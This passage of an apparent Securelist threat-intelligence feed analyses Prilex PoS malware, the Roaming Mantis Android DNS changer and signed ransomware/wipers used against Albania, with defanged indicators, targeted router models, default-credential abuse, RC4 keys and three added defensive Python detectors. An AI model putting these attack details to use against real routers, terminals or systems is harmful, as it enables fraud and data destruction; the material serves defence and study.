Of course, the goal here is to force the victim to use their physical card by inserting it into the PIN pad reader, so the malware will be able to capture the data coming from the transaction by using all the techniques described in our previous publication, such as manipulating cryptograms and performing a GHOST attack. Another interesting new feature added in the latest Prilex samples is the possibility to filter credit cards according to segment and create different rules for each segment. For example, these rules can block NFC and capture card data only if the card is a Black/Infinite, Corporate or another tier with a high transaction limit, which is much more attractive than standard credit cards with a low balance/limit.
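As an added detection example (not Prilex code or Kaspersky tooling), the following Python flags PoS terminals whose contactless failures are consistently followed within seconds by a chip insert, the pattern the fake "insert your card" message produces. The EFT event log format, the terminal ids and the thresholds are constructed assumptions.

```python
"""Heuristic for the forced-insert pattern described above.

Added example (not Prilex code or Kaspersky tooling). It assumes a constructed
EFT event log in which each line carries a timestamp, a terminal id, an event
name and, for failures, the text shown on the PIN pad. A terminal whose
contactless errors are almost always followed within seconds by a chip insert
is flagged for review.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: POS-02 shows the forced-insert pattern, POS-03 a
# single ordinary tap failure, POS-01 normal contactless traffic.
SAMPLE_LOG = """\
2022-11-14 09:01:10 term=POS-01 event=CONTACTLESS_OK amount=12.90
2022-11-14 09:03:42 term=POS-02 event=CONTACTLESS_ERROR msg="Contactless error, insert your card"
2022-11-14 09:03:58 term=POS-02 event=CHIP_INSERT amount=480.00
2022-11-14 09:10:05 term=POS-02 event=CONTACTLESS_ERROR msg="Contactless error, insert your card"
2022-11-14 09:10:21 term=POS-02 event=CHIP_INSERT amount=1250.00
2022-11-14 09:15:33 term=POS-02 event=CONTACTLESS_ERROR msg="Contactless error, insert your card"
2022-11-14 09:15:49 term=POS-02 event=CHIP_INSERT amount=2100.00
2022-11-14 09:20:00 term=POS-01 event=CONTACTLESS_OK amount=7.50
2022-11-14 09:22:11 term=POS-03 event=CONTACTLESS_ERROR msg="Read failure"
2022-11-14 09:30:00 term=POS-03 event=CONTACTLESS_OK amount=15.00
"""

EVENT_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) term=(?P<term>\S+) "
    r"event=(?P<event>\S+)(?P<rest>.*)$")
FAKE_ERROR_TEXT = "insert your card"  # wording of the bogus PIN pad message


def parse_events(text):
    """Parse the constructed log format into time-ordered event dicts."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if not m:
            continue  # skip lines that do not follow the constructed format
        events.append({"ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"),
                       "term": m["term"], "event": m["event"],
                       "rest": m["rest"].strip()})
    events.sort(key=lambda e: e["ts"])
    return events


def find_forced_insert_terminals(events, min_errors=3, window_s=60, min_ratio=0.8):
    """Return {terminal: stats} for terminals whose contactless errors are
    consistently followed by a chip insert within `window_s` seconds."""
    by_term = defaultdict(list)
    for e in events:
        by_term[e["term"]].append(e)
    window = timedelta(seconds=window_s)
    findings = {}
    for term, evs in by_term.items():
        errors = followed = fake_text = 0
        for i, e in enumerate(evs):
            if e["event"] != "CONTACTLESS_ERROR":
                continue
            errors += 1
            if FAKE_ERROR_TEXT in e["rest"].lower():
                fake_text += 1
            # Look for a chip insert on the same terminal inside the window.
            for nxt in evs[i + 1:]:
                if nxt["ts"] - e["ts"] > window:
                    break
                if nxt["event"] == "CHIP_INSERT":
                    followed += 1
                    break
        if errors and errors >= min_errors and followed / errors >= min_ratio:
            findings[term] = {"errors": errors, "followed_by_insert": followed,
                              "fake_message_hits": fake_text}
    return findings


if __name__ == "__main__":
    for term, stats in find_forced_insert_terminals(parse_events(SAMPLE_LOG)).items():
        print(f"{term}: review for NFC blocking -> {stats}")
```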

With contactless cards growing in numbers and adoption increasing all over the world, the number of payments using this method has increased significantly and is expected to grow further in the years to come. Since transaction data generated during a contactless payment are useless from a cybercriminal’s perspective, it is understandable that Prilex needs to force victims to insert the card into the infected PoS terminal. While the group is looking for a way to commit fraud with unique credit card numbers, this clever trick allows it to continue operating.

The Prilex family is detected by all Kaspersky products as HEUR:Trojan.Win32.Prilex and HEUR:Trojan.Win64.Prilex. More detailed analysis on the latest Prilex versions and a full analysis are available to customers of our private Threat Intelligence Reports. For any requests on this topic, please contact crimewareintel@kaspersky.com.

Roaming Mantis implements new DNS changer in its malicious mobile app in 2022
https://securelist.com/roaming-mantis-dns-changer-in-malicious-mobile-app/108464/
Thu, 19 Jan 2023 10:00:06 +0000

Roaming Mantis (a.k.a. Shaoye) is well known as a long-term cyberattack campaign that uses malicious Android package (APK) files to control infected Android devices and steal device information; it also uses phishing pages to steal user credentials, with a strong financial motivation.

Kaspersky has been investigating the actor’s activity throughout 2022, and we observed a DNS changer function used for getting into Wi-Fi routers and undertaking DNS hijacking. This was newly implemented in the known Android malware Wroba.o/Agent.eq (a.k.a Moqhao, XLoader), which was the main malware used in this campaign.

DNS changer via malicious mobile app

Back in 2018, Kaspersky first saw Roaming Mantis activities targeting the Asian region, including Japan, South Korea and Taiwan. At that time, the criminals compromised Wi-Fi routers for use in DNS hijacking, which is a very effective technique. It was identified as a serious issue in both Japan and South Korea. Through rogue DNS servers, all users accessing a compromised router were redirected to a malicious landing page. From mid-2019 until 2022, the criminals mainly used smishing instead of DNS hijacking to deliver a malicious URL as their landing page. The landing page identified the user’s device platform to provide malicious APK files for Android or redirect to phishing pages for iOS.

Infection flow with DNS hijacking

In September 2022, we carried out a deep analysis of Wroba.o (MD5 f9e43cc73f040438243183e1faf46581) and discovered the DNS changer was implemented to target specific Wi-Fi routers. It obtains the default gateway IP address as the connected Wi-Fi router IP, and checks the device model from the router’s admin web interface.

Code for checking Wi-Fi router model

The following strings are hardcoded for checking the Wi-Fi router model:

  • ipTIME N3-i
  • ipTIME N604plus-i
  • EFM Networks ipTIME N604plus-i
  • EFM Networks – ipTIME Q104
  • EFM Networks ipTIME Q104
  • EFM Networks – ipTIME Q204
  • EFM Networks ipTIME Q204
  • EFM Networks ipTIME V108
  • EFM Networks ipTIME Q604
  • EFM Networks ipTIME Q604 PINKMOD
  • EFM Networks ipTIME N104R
  • EFM Networks ipTIME N604R
  • EFM Networks ipTIME Q504
  • EFM Networks ipTIME N5
  • EFM Networks ipTIME N604V
  • EFM Networks ipTIME N104T
  • EFM Networks – ipTIME G301
  • title.n704bcm
  • title.a8004t
  • title.a2004sr
  • title.n804r
  • title.n104e
  • title.n104pk
  • title.a1004ns
  • title.a604m
  • title.n104pi
  • title.a2008
  • title.ax2004b
  • title.n104q
  • title.n604e
  • title.n704e
  • title.n704v3
  • title.n704v5
  • title.t5004
  • title.t5008
  • title.a1004
  • title.a2003nm
  • title.a2004sr
  • title.a5004nm
  • title.a604sky
  • title.n2pi
  • title.n604pi
  • title.a2004m
  • title.a3004nm
  • title.a7ns
  • title.a8txr
  • title.ew302nr
  • title.n602e
  • title.t16000
  • title.a3003ns
  • title.a6004nm
  • title.n1e
  • title.n3i
  • title.n6
  • title.a2004ns
  • title.n1pi
  • title.a2004r
  • title.n704bcm
  • title.n600
  • title.n102e
  • title.n702r
  • title.a8004i
  • title.a2004nm
  • title.t16000m
  • title.a8004t
  • title.a604r
  • title.a9004x2
  • title.a3004t
  • title.n804r
  • title.n5i
  • title.n704qc
  • title.a8004nm
  • title.a8004nb
  • title.n604p
  • title.a604gm
  • title.a3004
  • title.a3008
  • title.n2v
  • title.ax2004m
  • title.v504
  • title.n1p
  • title.n704bcm
  • title.ew302
  • title.n104qi
  • title.n104r
  • title.n2p
  • title.n608
  • title.q604
  • title.n104rsk
  • title.n2e
  • title.n604s
  • title.n604t
  • title.n702bcm
  • title.n804
  • title.n3
  • title.q504
  • title.a604
  • title.v308
  • title.a3004d
  • title.n104p
  • title.g104i
  • title.n604r
  • title.a2004
  • title.a704nb
  • title.a604v
  • title.n6004r
  • title.n604p
  • title.t3004
  • title.n5
  • title.n904
  • title.a5004ns
  • title.n8004r
  • title.n604vlg

From these hardcoded strings, we saw that the DNS changer functionality was implemented to target Wi-Fi routers located in South Korea: the targeted models have been used mainly in South Korea.

Next, the DNS changer connects to the hardcoded vk.com account “id728588947” to get the next destination, which is “107.148.162[.]237:26333/sever.ini”. The “sever.ini” (note the misspelling of server) dynamically provided the criminal’s current rogue DNS IP addresses.

Rogue DNS from a vk.com hardcoded account to compromise the DNS setting

Checking the code of the DNS changer, it seems to be using a default admin ID and password such as “admin:admin”. Finally, the DNS changer generates a URL query with the rogue DNS IPs to compromise the DNS settings of the Wi-Fi router, depending on the model, as follows.

Hardcoded default ID and password to compromise DNS settings using the URL query

We believe that the discovery of this new DNS changer implementation is very important in terms of security. The attacker can use it to manage all communications from devices using a compromised Wi-Fi router with the rogue DNS settings. For instance, the attacker can redirect to malicious hosts and interfere with security product updates. In 2016, details of another Android DNS changer were published, demonstrating why DNS hijacking is critical.

Users connect infected Android devices to free/public Wi-Fi in such places as cafes, bars, libraries, hotels, shopping malls and airports. When connected to a targeted Wi-Fi model with vulnerable settings, the Android malware will compromise the router and affect other devices as well. As a result, it is capable of spreading widely in the targeted regions.

Investigation of landing page statistics

As mentioned above, the main target region of the DNS changer was South Korea. However, the attackers targeted not only South Korea but also France, Japan, Germany, the United States, Taiwan, Turkey and other regions. Smishing has been observed as the main initial infection method in these regions, except South Korea, though we should keep in mind that the criminals may update the DNS changer function to target Wi-Fi routers in those regions in the near future.

In December 2022, we confirmed some landing pages and got an understanding of the number of downloaded APK files. Below are some examples of the download URLs from the landing page statistics.

Target region | Landing page IPs | Downloaded APKs | Examples of download URLs
Japan | 103.80.134[.]40, 103.80.134[.]41, 103.80.134[.]42, 103.80.134[.]48, 103.80.134[.]49, 103.80.134[.]50, 103.80.134[.]51, 103.80.134[.]52, 103.80.134[.]53, 103.80.134[.]54 | 24645 | http://3.wubmh[.]com/chrome.apk, http://5.hmrgt[.]com/chrome.apk, http://9v.tbeew[.]com/chrome.apk
Austria | 199.167.138[.]36, 199.167.138[.]38, 199.167.138[.]39, 199.167.138[.]40 | 7354 | http://8.ondqp[.]com/chrome.apk, http://5c2d.zgngu[.]com/chrome.apk, http://d.vbmtu[.]com/chrome.apk
France | 199.167.138[.]48, 199.167.138[.]49, 199.167.138[.]51, 199.167.138[.]52 | 7246 | http://j.vbrui[.]com/chrome.apk, http://vj.nrgsd[.]com/chrome.apk, http://k.uvqyo[.]com/chrome.apk
Germany | 91.204.227[.]144, 91.204.227[.]145, 91.204.227[.]146 | 5827 | https://mh.mgtnv[.]com/chrome.apk, http://g.dguit[.]com/chrome.apk, http://xtc9.rvnbg[.]com/chrome.apk
South Korea | 27.124.36[.]32, 27.124.36[.]34, 27.124.36[.]52, 27.124.39[.]241, 27.124.39[.]242, 27.124.39[.]243 | 508 | http://m.naver.com/chrome.apk, https://m.daum.net/chrome.apk (legitimate domains because of DNS hijacking)
Turkey | 91.204.227[.]131, 91.204.227[.]132 | 381 | http://y.vpyhc[.]com/chrome.apk, http://r48.bgxbm[.]com/chrome.apk, http://t9o.qcupn[.]com/chrome.apk
Malaysia | 134.122.137[.]14, 134.122.137[.]15, 134.122.137[.]16 | 154 | http://3y.tmztp[.]com/chrome.apk, http://1hy5.cwdqh[.]com/chrome.apk, http://53th.xgunq[.]com/chrome.apk
India | 199.167.138[.]41, 199.167.138[.]43, 199.167.138[.]44, 199.167.138[.]45 | 28 | http://w3.puvmw[.]com/chrome.apk, http://o.wgvpd[.]com/chrome.apk, http://kwdd.cehsg[.]com/chrome.apk

The number of downloaded APK files was reset at the beginning of December 2022. After a few days, we got the above numbers from the landing pages, and it showed us that Android malware was still being actively downloaded for some targeted regions. It also showed us that the most affected region was Japan, followed by Austria and France. From this investigation, we noted that the criminals have now also added Austria and Malaysia to their main target regions.

According to the download URLs for each region above, with the exception of South Korea, it seems that the criminals randomly generated and registered these domains to resolve the IP addresses of the landing page. It seems pretty obvious these domains were used as a link in the smishing for the initial infection. Regarding South Korea, the URLs have a legitimate domain because of DNS hijacking. Resolving the legitimate domain for “m.xxx.zzz” (for mobile) and “www.xxx.zzz” with rogue DNS and legitimate DNS yields the following results, respectively:

“m.xxx.zzz” + rogue DNS:

$ dig m.daum.net @193.239.154.15

; <<>> DiG 9.18.1-1ubuntu1.2-Ubuntu <<>> m.daum.net @193.239.154.15
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 15464
;; flags: qr rd; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;; QUESTION SECTION:
;m.daum.net.                    IN      A

;; ANSWER SECTION:
m.daum.net.             600     IN      A       27.124.39.243

;; Query time: 104 msec
;; SERVER: 193.239.154.15#53(193.239.154.15) (UDP)
;; WHEN: Wed Dec 07 02:09:51 GMT 2022
;; MSG SIZE  rcvd: 54

“www.xxx.zzz” + rogue DNS:

$ dig www.daum.net @193.239.154.15

; <<>> DiG 9.18.1-1ubuntu1.2-Ubuntu <<>> www.daum.net @193.239.154.15
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 40935
;; flags: qr rd; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;; QUESTION SECTION:
;www.daum.net.                  IN      A

;; ANSWER SECTION:
www.daum.net.           600     IN      A       121.53.105.193

;; Query time: 48 msec
;; SERVER: 193.239.154.15#53(193.239.154.15) (UDP)
;; WHEN: Wed Dec 07 02:09:57 GMT 2022
;; MSG SIZE  rcvd: 58

As you can see, their rogue DNS only works in the mobile domain, which is “m.xxx.zzz”. We believe the criminals only filtered a limited number of domains that can be resolved to their landing page to hide their activity from security researchers.
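An added check for this selective hijack pattern (example code, not Roaming Mantis code or Kaspersky tooling): it parses the dig output above, compares the answers with those from a trusted resolver, and flags a resolver on the rogue DNS list, an answer pointing at a known landing page, and a mismatch that affects only the mobile subdomain. The trusted answer for m.daum.net is a constructed placeholder, since the article does not show the legitimate record.

```python
"""Offline check for the selective DNS hijack described above.

Added example (not Roaming Mantis code or Kaspersky tooling). It parses `dig`
output for names queried through the router's resolver, compares the answers
with those from a trusted resolver, and reports the patterns the article
describes.
"""
import re

# Rogue resolvers and South Korean landing page IPs taken from the article.
ROGUE_DNS = {"193.239.154.15", "193.239.154.16", "193.239.154.17",
             "193.239.154.18", "193.239.154.22"}
LANDING_PAGE_IPS = {"27.124.36.32", "27.124.36.34", "27.124.36.52",
                    "27.124.39.241", "27.124.39.242", "27.124.39.243"}

ANSWER_RE = re.compile(
    r"^(?P<name>[A-Za-z0-9.-]+)\.\s+\d+\s+IN\s+A\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s*$",
    re.MULTILINE)
SERVER_RE = re.compile(r"^;; SERVER: (?P<ip>\d{1,3}(?:\.\d{1,3}){3})#\d+", re.MULTILINE)


def parse_dig(text):
    """Return (resolver_ip, {name: set of A records}) from one or more dig runs."""
    answers = {}
    for m in ANSWER_RE.finditer(text):
        answers.setdefault(m["name"], set()).add(m["ip"])
    servers = {m["ip"] for m in SERVER_RE.finditer(text)}
    if len(servers) != 1:
        raise ValueError(f"expected exactly one resolver in dig output, got {servers}")
    return servers.pop(), answers


def assess(dig_text, trusted_answers):
    """Compare resolver answers with trusted ones; return a list of findings."""
    resolver, answers = parse_dig(dig_text)
    findings = []
    if resolver in ROGUE_DNS:
        findings.append(("rogue_resolver", resolver))
    mismatched, matched = [], []
    for name in sorted(answers):
        ips = answers[name]
        hits = ips & LANDING_PAGE_IPS
        if hits:
            findings.append(("landing_page_ip", name, sorted(hits)))
        expected = trusted_answers.get(name)
        if expected is None:
            continue  # nothing to compare against
        (mismatched if ips != expected else matched).append(name)
    if mismatched and matched:
        # The article's case: only m.xxx.zzz is redirected, www.xxx.zzz is untouched.
        findings.append(("selective_hijack", mismatched, matched))
    elif mismatched:
        findings.append(("hijack", mismatched))
    return findings


# Condensed copy of the article's two dig runs against the rogue resolver.
ROGUE_DIG_OUTPUT = """\
; <<>> DiG 9.18.1-1ubuntu1.2-Ubuntu <<>> m.daum.net @193.239.154.15
;; ANSWER SECTION:
m.daum.net.             600     IN      A       27.124.39.243
;; SERVER: 193.239.154.15#53(193.239.154.15) (UDP)

; <<>> DiG 9.18.1-1ubuntu1.2-Ubuntu <<>> www.daum.net @193.239.154.15
;; ANSWER SECTION:
www.daum.net.           600     IN      A       121.53.105.193
;; SERVER: 193.239.154.15#53(193.239.154.15) (UDP)
"""

# Constructed trusted answers: the article does not show the legitimate
# m.daum.net record, so 203.0.113.10 (TEST-NET-3) is a placeholder.
TRUSTED_ANSWERS = {"m.daum.net": {"203.0.113.10"}, "www.daum.net": {"121.53.105.193"}}

if __name__ == "__main__":
    for finding in assess(ROGUE_DIG_OUTPUT, TRUSTED_ANSWERS):
        print(*finding)
```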

Geography based on KSN

Our telemetry showed the detection rate of Wroba.o (Trojan-Dropper.AndroidOS.Wroba.o) for each region such as France (54.4%), Japan (12.1%) and the United States (10.1%). When compared with the landing page statistics above, the results are similar in that many detections have been observed in France, Japan, Austria and Germany. On the other hand, while we had previously monitored landing pages for the United States, this time we haven’t seen those landing pages.

Conclusions

From 2019 to 2022, Kaspersky observed that the Roaming Mantis campaign mainly used smishing to deliver a malicious URL to their landing page. In September 2022, we analyzed the new Wroba.o Android malware and discovered a DNS changer function that was implemented to target specific Wi-Fi routers used mainly in South Korea. Users with infected Android devices that connect to free or public Wi-Fi networks may spread the malware to other devices on the network if the Wi-Fi network they are connected to is vulnerable. Kaspersky experts are concerned about the potential for the DNS changer to be used to target other regions and cause significant issues. Kaspersky products detect this Android malware as HEUR:Trojan-Dropper.AndroidOS.Wroba.o or HEUR:Trojan-Dropper.AndroidOS.Agent.eq, providing protection from this cyberthreat to Kaspersky’s customers and users.

IoCs

MD5 of Wroba.o

Domains of landing pages:

IPs of landing pages:

Rogue DNS:
193.239.154[.]15
193.239.154[.]16
193.239.154[.]17
193.239.154[.]18
193.239.154[.]22

Hardcoded malicious accounts of vk.com to obtain live rogue DNS servers:
id728588947

Providing live rogue DNS servers:
107.148.162[.]237:26333/sever.ini

Suspicious accounts/pages of some legitimate services for obtaining C2s

C&C

Ransomware and wiper signed with stolen certificates
https://securelist.com/ransomware-and-wiper-signed-with-stolen-certificates/108350/
Thu, 22 Dec 2022 08:00:32 +0000

Introduction

On July 17, 2022, Albanian news outlets reported a massive cyberattack that affected Albanian government e-services. A few weeks later, it was revealed that the cyberattacks were part of a coordinated effort likely intended to cripple the country’s computer systems. On September 10, 2022, Albanian local news reported a second wave of cyberattacks targeting Albania’s TIMS, ADAM and MEMEX systems – the latter two systems critical for law enforcement – reportedly using the same attack type and by the same actors.

Around the same time, we identified ransomware and wiper malware samples resembling those used in the first wave, though with a few interesting modifications that likely allowed evasion of security controls and better attack speeds. Chief among those changes are the embedding of a raw disk driver, providing direct hard disk access inside the malware itself, modified metadata, and the use of Nvidia’s leaked code signing certificate to sign the malware.

So, what’s new in this blogpost?

  • We compare the first and second waves of ransomware and wiper malware used to target Albanian entities and detail connections with previously known ROADSWEEP ransomware and ZEROCLEARE variants.
  • The threat actors used certificates from Nvidia and Kuwait Telecommunications Company to sign their malware; the former was already leaked, but we’re not sure how they got their hands on the latter.
  • We identified potential cooperation between different attack groups speaking different languages, and the possible use of AnyDesk as an initial entry point to start the ransomware/wiper infections.
  • The changes implemented to automate and speed up wiping in the second wave of attacks are reminiscent of the notorious Shamoon wiper attacks in the Middle East.

Wiper and ransomware, comparing wave 1 and wave 2

Below, we compare and discuss the differences between the wave 1 and wave 2 ransomware and wiper malware.

Initial Infection – traces of cooperation between different attack groups and use of AnyDesk utility

Although we weren’t able to identify the initial entry point of the threat actor in the analyzed intrusion, a few days after the second-wave wiping activity we noticed underground chatter about someone having access to an AnyDesk account at another significant, non-governmental Albanian entity, along with suggestions that Persian-speaking hackers use it to deploy ransomware or wiper malware. This increases the likelihood that the initial entry point for wave 2 was legitimate remote access software such as AnyDesk, especially since the wave 2 wiper modifications included automatic execution upon driver installation only, a potential sign of urgency due to a limited time/access window. The attackers and the access provider appeared to belong to different attack groups and spoke different languages.

The ransomware – use of Kuwait Telecommunications Company signing certificate

MD5 96eabcc77a6734ea8587599685fbf1b4
SHA1 6a36962709abbfc1f88f87e7fe88a417302bfe43
SHA256 8ad01b028e6aa711d26879d346a7bef82516e372e0f14e8e69db6aef0f25d992
Imphash 653ee44c85bc91d12ec33dfed8056c27
Link time Wed Jul 06 21:30:41 2016
File type 32-bit executable
Compiler MinGW-w32 gcc
File size 45.48 KB
File name PdftoDoc.exe

This second wave sample has the same signing certificate parameters as the first wave sample, which is related to Kuwait Telecommunications Company. It’s unclear how the threat actor was able to sign its malware using Kuwait Telecommunications Company’s certificate, but we suspect it was stolen. As of the date of this publication, the certificate is no longer valid and has been revoked.

After the initial execution, the wave 2 ransomware checks for any six arguments (or more) supplied by the threat actor, as opposed to the wave 1 sample that checks for five arguments or more – a small modification that assists in defense evasion. Nevertheless, the intrusion analysis conducted on one of the affected machines indicates that in wave 2 the threat actor did not use a BAT file to invoke the ransomware while supplying seven digits similar to wave 1, but instead invoked the wave 2 ransomware immediately from the command line using six zeroes: “000000”. If ransomware execution fails because the correct arguments are not supplied, the wave 2 sample displays a different message from that of wave 1; the wave 2 message resembles an error message displayed by a PDF to DOC converter.

Wave 1 sample – messaging after failed execution

Wave 2 sample – different messaging after failed execution

The wave 2 ransomware sample continues execution and checks for the mutex Screenlimitsdevices#77!;, a value that differs from the wave 1 sample’s mutex:
abcdefghijklmnoklmnopqrstuvwxyz01234567890abcdefghijklmnopqrstuvwxyz01234567890

Although we call this malware ransomware based on its behavior, the encrypted files are, in fact, unrecoverable. When comparing wave 2 ransomware samples to wave 1, we notice that both have the same , and both use CreateFile and WriteFile APIs to overwrite files. During the process of execution, wave 2 ransomware attempts to decrypt and execute embedded scripts, malware settings or API function names. The encryption algorithm used is RC4 in both wave 1 and wave 2. However, the RC4 key for decryption in wave 2 has been changed in another attempt to evade detection.

  • Wave 1 RC4 key: 8C E4 B1 6B 22 B5 88 94 AA 86 C4 21 E8 75 9D F3
  • Wave 2 RC4 key: F0 B4 ED D9 43 F5 C8 43 C9 D0 A2 4F 22 9B BC 3A

It’s worth noting that in both waves, the RC4 decryption method uses CryptoAPI (CryptDecrypt) instead of the usual substitution box method. The intrusion we analyzed in wave 2 indicates that the ransomware was probably deployed over the internal network, possibly from another compromised machine. This is reinforced by the fact that we didn’t see anything else dropped or executed before the ransomware execution, and the ransomware executable name was randomly generated, potentially by the tool the threat actor used to deploy it over the network (e.g., Mellona.exe).
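As an added example (not code from the post or from the samples), the RC4 key rotation described above and how an analyst’s string decryptor should handle it: textbook RC4 with both documented keys, each tried against an embedded blob, keeping the result that decodes to readable text. The blob below is constructed here, and the cipher is standard RC4 rather than a reproduction of the malware’s CryptoAPI CryptDecrypt call.

```python
from typing import Optional

# RC4 keys documented for the two waves (hex bytes from the write-up).
KNOWN_KEYS = {
    "wave 1": bytes.fromhex("8CE4B16B22B58894AA86C421E8759DF3"),
    "wave 2": bytes.fromhex("F0B4EDD943F5C843C9D0A24F229BBC3A"),
}

def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):  # key-scheduling: permute S under the key
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:  # keystream generation XORed onto the data
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def printable_ratio(blob: bytes) -> float:
    """Share of printable-ASCII bytes: a cheap plausibility score for a decryption."""
    if not blob:
        return 0.0
    return sum(32 <= b < 127 or b in (9, 10, 13) for b in blob) / len(blob)

def decrypt_with_known_keys(blob: bytes, threshold: float = 0.95) -> Optional[tuple]:
    """Try every documented key; return (wave, plaintext) for the best readable
    result, or None when no key yields text (e.g. the key was rotated again)."""
    best = None
    for wave, key in KNOWN_KEYS.items():
        candidate = rc4(key, blob)
        score = printable_ratio(candidate)
        if score >= threshold and (best is None or score > best[0]):
            best = (score, wave, candidate)
    return None if best is None else (best[1], best[2])

# Constructed stand-in for an embedded string blob; not taken from a real sample.
SAMPLE_PLAINTEXT = b"CreateFile;WriteFile;Screenlimitsdevices#77!"
SAMPLE_BLOB = rc4(KNOWN_KEYS["wave 2"], SAMPLE_PLAINTEXT)

if __name__ == "__main__":
    # A wave 1-only decryptor gets garbage; trying both keys recovers the text.
    print(decrypt_with_known_keys(SAMPLE_BLOB))
```

A decryptor hard-wired to the wave 1 key silently produces noise on wave 2 blobs, which is exactly the static-detection gap the key change was meant to open.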

Despite all the changes made in the wave 2 ransomware, the ransom notes remained the same and included political messaging that reflects the geopolitical tensions between Albania and Iran.

Ransom note in both wave 1 and wave 2 ransomware

The wiper – use of Nvidia signing certificate

MD5 64cb923be15ae255b82e7ebcf24ccfc5
SHA1 e1b8b72fbd1e3b9bbf8bebd2e14a3f2e071c6048
SHA256 d8ec8ec8dfa582c44e81b8a7fcc44defc3d2fa658f75fa495124aedc3b0db367
Imphash 81CA8B811412284938148FC4F2A76C09
Link time 0x6319C758 (Thu Sep 08 03:43:36 2022)
File type PE 64-bit
Compiler Microsoft Visual C/C++
File size 174.00 KB
File name DiskSnapshot.exe
Driver PDB path c:\projects\rawdisk\bin\wnet\fre\amd64\rawdsk3.pdb
Driver key B4B615C28CCD059CF8ED1ABF1C71FE03C0354522990AF63ADF3C911E2287A4B906D47D

Similar to the wave 2 ransomware sample, the threat actor made several modifications to the wave 2 wiper malware, probably to evade detection. The three main changes are:

  • Modified malware signing
  • Embedding of EldoS RawDisk driver inside the wiper malware
  • Automatic wiping after driver installation command

Historically, in ZEROCLEARE and DUSTMAN incidents from 2019, the wiper malware and raw disk drivers were not signed and therefore could not directly access the raw disk for speedy data wiping. So, the wipers had to use a third-party loader such as TDL – a signed loader for unsigned drivers – to install the unsigned raw disk driver that allows the wiper malware to directly access the raw disk for wiping data using DeviceControl API methods. However, in the first attack wave targeting Albania, the threat actor signed the wave 1 wiper using the Kuwait Telecommunications Company certificate, thus removing the need for a third-party loader. The speed and automation improvements remind us of previous Shamoon operations in the Middle East.

Since the wave 1 wipers were exposed in July 2022, and likely to avoid static detections, the threat actor used Nvidia’s leaked signing certificate to sign the wave 2 wiper in September 2022, again eliminating the need for a third-party loader for the raw disk driver.

In wave 1, the wiper malware expected to find the raw disk driver in the execution directory or in the system directory. The driver wasn’t dropped by the wiper, and the threat actor likely dropped it using other means. Conversely, in wave 2 the threat actor embedded the signed raw disk driver in the wiper executable, dropped it and then installed it. In addition, the driver used by the threat actor in wave 2 seems to copy metadata and a few functions from Microsoft’s diskdump.sys crash dump driver[1] (version 10.0.19041.1682) as another means to avoid detection. The wiping activity starts automatically after the driver installation command, as opposed to the wave 1 wiper, where installation is one step and wiping execution is a second step.

Finally, for the most part, wave 1 and wave 2 wipers remained the same, including the reliance on the same authentication key to access the raw disk driver, and the use of the same DeviceControl API methods, but with one exception, as shown below. It’s worth noting that the method IOCTL_DISK_GET_LENGTH_INFO is exclusive to all Persian-speaking APT wipers.

  • Wave 1 wiper DeviceControl API methods:
    • IOCTL_DISK_GET_DRIVE_GEOMETRY_EX
    • IOCTL_DISK_GET_DRIVE_GEOMETRY
    • IOCTL_DISK_GET_LENGTH_INFO
  • Wave 2 wiper DeviceControl API methods:
    • IOCTL_VOLUME_GET_VOLUME_DISK_EXTENTS (new method in wave 2; used in multiple instances)
    • IOCTL_DISK_GET_DRIVE_GEOMETRY
    • IOCTL_DISK_GET_LENGTH_INFO

Based on our telemetry, we suspect the infections are associated with law enforcement institutions in Albania. This targeting is consistent with the previous wave of cyberattacks, which affected the Albanian government in July 2022.

Conclusions

In this publication, we discussed the changes made to the second wave of ransomware and wiper samples that targeted Albanian institutions to evade detection and inflict maximum damage.

Aside from the changes made to evade detection in wave 2, we suspect that the threat actors needed an automated and speedy wiper execution. In wave 2, the raw disk driver was embedded inside the malware and the wiping routine started immediately after driver installation, as opposed to the wave 1 procedure. This is reminiscent of Shamoon operations in the Middle East.

Finally, for defenders we can highlight two important elements from the intrusion and malware analysis presented here:

  • Monitor for remote software activities such as AnyDesk for unauthorized use
  • Always hunt and monitor for expired and/or leaked signing certificates as they can be used by threat actors to load and execute malware

Threat detection

The detection logic has been improved in all our solutions to ensure that our customers remain protected. We continue to investigate this threat using our Threat Intelligence and will add further detection logic as it becomes available.

Our products protect against this threat and detect it with the following names:

  • HEUR:Trojan-Ransom.Win32.Agent.gen
  • Trojan-Ransom.Win32.Gen.aghh
  • Trojan-Ransom.Win64.Agent.dpf
  • Trojan.Win32.Agentb.kzkj

Indicators of compromise

File hashes (malicious documents, Trojans, emails, decoys)

Ransomware

96eabcc77a6734ea8587599685fbf1b4 PdftoDoc.exe (wave 2)
bbe983dba3bf319621b447618548b740 GoXml.exe (wave 1)

Wiper

64cb923be15ae255b82e7ebcf24ccfc5 DiskSnapshot.exe (wave 2)
7b71764236f244ae971742ee1bc6b098 cl.exe (wave 1)

Driver

C7BE7E90F63DADA6CD541FA84880874B $windir\$system32\drivers\disksdump.sys (originally known as diskdump.sys)

Signing certificates serial numbers

14 78 1B C8 62 E8 DC 50 3A 55 93 46 F5 DC C5 18 Nvidia certificate
01 FD D0 93 F6 50 87 F4 E9 AE 11 ED 65 0D 83 E8 Kuwait Telecommunications Company certificate

[1] Original, legitimate driver’s MD5 is 015caeec9148194054b5b1de64762a43
